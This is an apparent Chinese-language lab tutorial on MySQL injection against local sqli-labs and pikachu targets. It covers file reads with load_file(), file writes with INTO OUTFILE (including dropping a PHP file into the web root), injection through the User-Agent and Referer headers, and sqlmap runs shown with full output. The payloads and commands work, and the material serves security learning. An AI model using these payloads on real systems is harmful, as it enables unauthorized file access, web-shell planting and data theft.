文章目录
一、MySQL注入读写文件
1.搭建新的测试环境(靶场)
pikachu是一个比较详细的漏洞平台,是使用php搭建的,需要php环境和mysql数据库支持。
可点击https://download.csdn.net/download/CUFEECR/12230045下载后解压并拷贝到phpstudy下的WWW目录下,便可以开始测试了。
安装和初始化步骤如下:
由于配置文件中已经将初始参数等设置好,所以可以不用修改、直接使用。
可以在pikachu上进行注入测试。
2.读写文件概述
MySQL数据库在渗透过程中能够使用的功能很多,除了读取数据,还可以对文件进行读写。
读写的前提:
- 用户权限足够高,尽量具有root权限
secure_file_priv不为null
3.读取文件
SQL中查询
show global variables like 'secure_file_priv';
打印
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | NULL |
+------------------+-------+
1 row in set, 1 warning (0.01 sec)
默认为Null,需要在配置文件中进行配置:
在 [mysqld] 下增加一行secure_file_priv=,即设置secure_file_priv为空(不同于Null),重启mysql,再次查询,结果为
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set, 1 warning (0.01 sec)
此时变为空,可以进行文件读取。
MySQL读取文件用load_file()函数。
读取文件:
select load_file('XXXX\target.txt');
打印
+-------------------------------------------------+
| load_file('XXXX\target.txt') |
+-------------------------------------------------+
| NULL |
+-------------------------------------------------+
1 row in set (0.00 sec)
此时读取文件为空,说明还存在问题,需要将路径改为\\,再次进行测试:
select load_file('XXXX\\target.txt');```
打印
```sql
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| load_file('XXXX\\target.txt')
|
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| POST /sqli-labs/Less-12/ HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 28
Pragma: no-cache
Cache-Control: no-cache
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: http://127.0.0.1/sqli-labs/Less-12/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
uname=&passwd=&submit=Submit |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
此时即可正常读取文件。
访问http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,load_file(‘C:\Users\Lenovo\Desktop\target.txt’),3 --+,显示:
读取出文档中的内容。
4.写入文件
查看写入文件选项:
show variables like '%general%';
打印
+------------------+-----------------------------------------------------------------------+
| Variable_name | Value |
+------------------+-----------------------------------------------------------------------+
| general_log | OFF |
| general_log_file | XXXX\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log |
+------------------+-----------------------------------------------------------------------+
2 rows in set, 1 warning (0.01 sec)
默认为关闭。
开启文件写入:
set global general_log = on;
打印
Query OK, 0 rows affected (0.00 sec)
此时再查询,打印:
+------------------+-----------------------------------------------------------------------+
| Variable_name | Value |
+------------------+-----------------------------------------------------------------------+
| general_log | ON |
| general_log_file | XXXX\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log |
+------------------+-----------------------------------------------------------------------+
2 rows in set, 1 warning (0.00 sec)
显然,打开了文件写入,并且保存在E:\MySQL\phpstudy_pro\Extensions\MySQL5.7.26\data\LAPTOP-61GNXXXX.log之下。
写入文件用into outfile。
SQL测试:
select * from users into outfile 'XXXX\\users.txt';
打印
Query OK, 14 rows affected (0.00 sec)
此时,桌面生成users.txt文件,内容为:
1 Dumb Dumb
2 Angelina I-kill-you
3 Dummy p@ssword
4 secure crappy
5 stupid stupidity
6 superman genious
7 batman mob!le
8 admin admin
9 admin1 admin1
10 admin2 admin2
11 admin3 admin3
12 dhakkan dumbo
13 admin4 admin4
14 admin5 admin5
访问http://127.0.0.1/sqli-labs/Less-7/?id=1’)) union select 1,’<?php phpinfo(); ?>’,3 into outfile ‘E:\MySQL\phpstudy_pro\WWW\sqli-labs\Less-7\1.php’ --+,显示:
虽然报错,但是可以看到php路径下的sqli-libs下的less-7下已经出现了1.php,内容为:
1 Dumb Dumb
1 <?php phpinfo(); ?> 3
访问http://127.0.0.1/sqli-labs/Less-7/1.php,可以看到:
显然,会暴露很多关于php的信息,可能存在安全风险。
sqlmap测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-7/?id=1 --file-read "XXXX\\target.txt"
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:08:08 /2020-03-05/
[20:08:08] [INFO] testing connection to the target URL
[20:08:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:08:08] [INFO] testing if the target URL content is stable
[20:08:09] [INFO] target URL content is stable
[20:08:09] [INFO] testing if GET parameter 'id' is dynamic
[20:08:09] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:08:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[20:08:09] [INFO] testing for SQL injection on GET parameter 'id'
[20:08:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:08:09] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="are")
[20:08:10] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:08:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:08:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:08:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:08:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:08:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:08:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:08:15] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:08:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:08:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:08:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:08:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:08:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:08:16] [INFO] testing 'Generic inline queries'
[20:08:16] [INFO] testing 'MySQL inline queries'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:08:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:08:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:08:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:08:26] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:08:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:08:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:08:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:08:27] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:08:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[20:08:28] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[20:08:28] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[20:08:29] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[20:08:30] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[20:08:30] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[20:08:31] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 284 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1379=1379 AND ('FhWh'='FhWh
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 1975 FROM (SELECT(SLEEP(5)))AHJv) AND ('IFMc'='IFMc
---
[20:08:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:08:46] [INFO] fingerprinting the back-end DBMS operating system
[20:08:46] [INFO] the back-end DBMS operating system is Windows
[20:08:46] [INFO] fetching file: 'C:/Users/Lenovo/Desktop/target.txt'
[20:08:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:08:46] [INFO] retrieved: 504F5354202F73716C692D6C6162732F4C6573732D31322F20485454502F312E310D0A486F73743A203132372E302E302E310D0A436F6E6E656374696F6E3A206B6565702D616C6976650D0A436F6E74656E742D4C656E6774683A2032380D0A507261676D613A206E6F2D63616368650D0A43616368652D436F6E74726F6C3A206E6F2D63616368650D0A4F726967696E3A20687474703A2F2F3132372E302E302E310D0A557067726164652D496E7365637572652D52657175657374733A20310D0A436F6E74656E742D547970653A206170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F6465640D0A557365722D4167656E743A204D6F7A696C6C612F352E30202857696E646F7773204E542031302E303B20574F57363429204170706C655765624B69742F3533372E333620284B48544D4C2C206C696B65204765636B6F29204368726F6D652F38302E302E333938372E313136205361666172692F3533372E33360D0A5365632D46657463682D446573743A20646F63756D656E740D0A4163636570743A20746578742F68746D6C2C6170706C69636174696F6E2F7868746D6C2B786D6C2C6170706C69636174696F6E2F786D6C3B713D302E392C696D6167652F776562702C696D6167652F61706E672C2A2F2A3B713D302E382C6170706C69636174696F6E2F7369676E65642D65786368616E67653B763D62333B713D302E390D0A5365632D46657463682D536974653A2073616D652D6F726967696E0D0A5365632D46657463682D4D6F64653A206E617669676174650D0A5365632D46657463682D557365723A203F310D0A526566657265723A20687474703A2F2F3132372E302E302E312F73716C692D6C6162732F4C6573732D31322F0D0A4163636570742D456E636F64696E673A20677A69702C206465666C6174652C2062720D0A4163636570742D4C616E67756167653A207A682D434E2C7A683B713D302E390D0A436F6F6B69653A2063737266746F6B656E3D6764687352524738434F586D556D636F524276626332353972596E62504B584670456967674F485146394D5A784D6B6D427358387A6176564379755742376F460D0A0D0A756E616D653D267061737377643D267375626D69743D5375626D6974 do you want confirmation that the remote file 'XXXX/target.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n]
[20:27:00] [INFO] retrieved:
[20:27:00] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:27:00] [WARNING] unexpected HTTP code 'None' detected. Will use (extra) validation step in similar cases
[20:27:00] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
832
[20:27:00] [INFO] the local file 'XXX\sqlmap\output\127.0.0.1\files\C__Users_Lenovo_Desktop_target.txt' and the remote file 'C:/Users/Lenovo/Desktop/target.txt' have the same size (832 B)
files saved to [1]:
[*] XXX\sqlmap\output\127.0.0.1\files\C__Users_Lenovo_Desktop_target.txt (same file)
[20:27:00] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'
[*] ending @ 20:27:00 /2020-03-05/
读取到的内容被保存到XXX\sqlmap\output\127.0.0.1\files目录下的XXXX_target.txt。
二、HTTP头中的SQL注入
1.HTTP头中的SQL注入介绍
在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。
例如SQL注入中用户提交的参数都会被代码中的某些措施进行过滤;
过滤掉用户直接提交的参数,但是对于HTTP头中提交的内容很有可能就没有进行过滤。
updatexml函数
UPDATEXML(XML_document, XPath_string, new_value);
参数说明:
- XML_document是String格式,为XML文档对象的名称,文中为Doc
- XPath_string是Xpath格式的字符串
- new_value是String格式,替换查找到的符合条件的数据
2.HTTP User-Agent注入
访问http://127.0.0.1/sqli-labs/Less-18/,显示:
显示出IP地址和浏览器User-Agent。
测试出闭合单引号:
select * from users where id = '1' or '1' = '1';
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
在user-agent后加入' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1,测试use-agent注入,操作如下:
预览显示:
即暴露出数据库版本为5.7.26。
注意:
上述操作必须在Firefox浏览器下操作,因为Firefox才有编辑重发功能;
0x7e是16进制,表示~,是为了让给出的信息更加明显而加入的。
在user-agent后加入' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1' = '1,显示如下:
显然,探测出数据库为security。
在BURPSUITE中重发
3.HTTP Referer注入
在Firefox测试并编辑重发,如下:
存在注入点,进行测试,如下:
显然,延迟了5秒左右才得到响应。
注意:
如访问页面未显示referer,可能是因为phpstudy版本较高,可以更换低版本,重新搭建测试环境进行测试。
sqlmap安全测试
测试的3种方式:
- –forms自动搜索POST表单注入
- –data指定参数探测SQL注入
- 读取文件,referer注入把referer改成 * 或者在后面加上*
(1)使用--forms测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-19/ --forms --banner --batch
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:27:53 /2020-03-10/
[12:27:53] [INFO] testing connection to the target URL
[12:27:55] [INFO] searching for forms
[#1] form:
POST http://127.0.0.1/sqli-labs/Less-19/
POST data: uname=&passwd=&submit=Submit
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&passwd=&submit=Submit] (Warning: blank fields detected): uname=&passwd=&submit=Submit
do you want to fill blank fields with random values? [Y/n] Y
[12:27:57] [INFO] using 'XXX\sqlmap\output\results-03102020_1227pm.csv' as the CSV results file in multiple targets mode
[12:28:00] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:28:02] [INFO] testing if the target URL content is stable
[12:28:04] [INFO] target URL content is stable
[12:28:04] [INFO] testing if POST parameter 'uname' is dynamic
[12:28:06] [WARNING] POST parameter 'uname' does not appear to be dynamic
[12:28:08] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[12:28:10] [INFO] testing for SQL injection on POST parameter 'uname'
[12:28:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:28:20] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:28:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:28:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:28:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:28:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:29:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:29:05] [INFO] testing 'Generic inline queries'
[12:29:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:29:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:29:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:29:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:29:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:29:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:30:02] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[12:30:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:32] [WARNING] POST parameter 'uname' does not seem to be injectable
[12:30:32] [INFO] testing if POST parameter 'passwd' is dynamic
[12:30:34] [WARNING] POST parameter 'passwd' does not appear to be dynamic
[12:30:36] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable
[12:30:38] [INFO] testing for SQL injection on POST parameter 'passwd'
[12:30:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:30:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:30:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:31:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:31:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:31:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:31:33] [INFO] testing 'Generic inline queries'
[12:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:31:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:31:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:32:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:32:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:32:30] [INFO] testing 'Oracle AND time-based blind'
[12:32:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:33:01] [WARNING] POST parameter 'passwd' does not seem to be injectable
[12:33:01] [INFO] testing if POST parameter 'submit' is dynamic
[12:33:03] [WARNING] POST parameter 'submit' does not appear to be dynamic
[12:33:05] [WARNING] heuristic (basic) test shows that POST parameter 'submit' might not be injectable
[12:33:07] [INFO] testing for SQL injection on POST parameter 'submit'
[12:33:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:33:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:33:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:33:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:33:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:33:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:34:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:34:02] [INFO] testing 'Generic inline queries'
[12:34:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:34:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:34:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:34:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:34:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:34:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:34:59] [INFO] testing 'Oracle AND time-based blind'
[12:35:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:35:29] [WARNING] POST parameter 'submit' does not seem to be injectable
[12:35:29] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next form
[12:35:29] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_1227pm.csv'
[*] ending @ 12:35:29 /2020-03-10/
此时,未发现注入点。
(2)使用--data进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-19/ --data="uname=admin&passwd=admin" --banner --batch
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:38:46 /2020-03-10/
[12:38:46] [INFO] testing connection to the target URL
[12:38:50] [INFO] testing if the target URL content is stable
[12:38:55] [INFO] target URL content is stable
[12:38:55] [INFO] testing if POST parameter 'uname' is dynamic
[12:38:57] [INFO] POST parameter 'uname' appears to be dynamic
[12:38:59] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[12:39:01] [INFO] testing for SQL injection on POST parameter 'uname'
[12:39:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:39:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:39:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:39:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:39:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:40:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:40:08] [INFO] testing 'Generic inline queries'
[12:40:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:40:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:40:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:40:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:40:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:40:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:41:05] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[12:41:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:41:25] [WARNING] POST parameter 'uname' does not seem to be injectable
[12:41:25] [INFO] testing if POST parameter 'passwd' is dynamic
[12:41:27] [INFO] POST parameter 'passwd' appears to be dynamic
[12:41:29] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable
[12:41:31] [INFO] testing for SQL injection on POST parameter 'passwd'
[12:41:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:41:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:41:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:42:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:42:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:42:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:42:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:42:38] [INFO] testing 'Generic inline queries'
[12:42:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:42:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:42:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:43:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:43:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:43:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:43:35] [INFO] testing 'Oracle AND time-based blind'
[12:43:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:43:55] [WARNING] POST parameter 'passwd' does not seem to be injectable
[12:43:55] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 12:43:55 /2020-03-10/
显然还是未发现注入点,可以增加风险等级,也可以通过文件指定注入点进行探测。
(3)文件中标注*测试:
先建立并保存文件如下:
用*指定了注入点。
再用该文件测试:
python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3 --dbms mysql
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:18:18 /2020-03-10/
[13:18:18] [INFO] parsing HTTP request from 'XXXX\target.txt'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[13:18:18] [INFO] testing connection to the target URL
[13:18:20] [INFO] testing if the target URL content is stable
[13:18:23] [INFO] target URL content is stable
[13:18:23] [INFO] testing if (custom) HEADER parameter 'Referer #1*' is dynamic
[13:18:25] [WARNING] (custom) HEADER parameter 'Referer #1*' does not appear to be dynamic
[13:18:27] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Referer #1*' might be injectable (possible DBMS: 'MySQL')
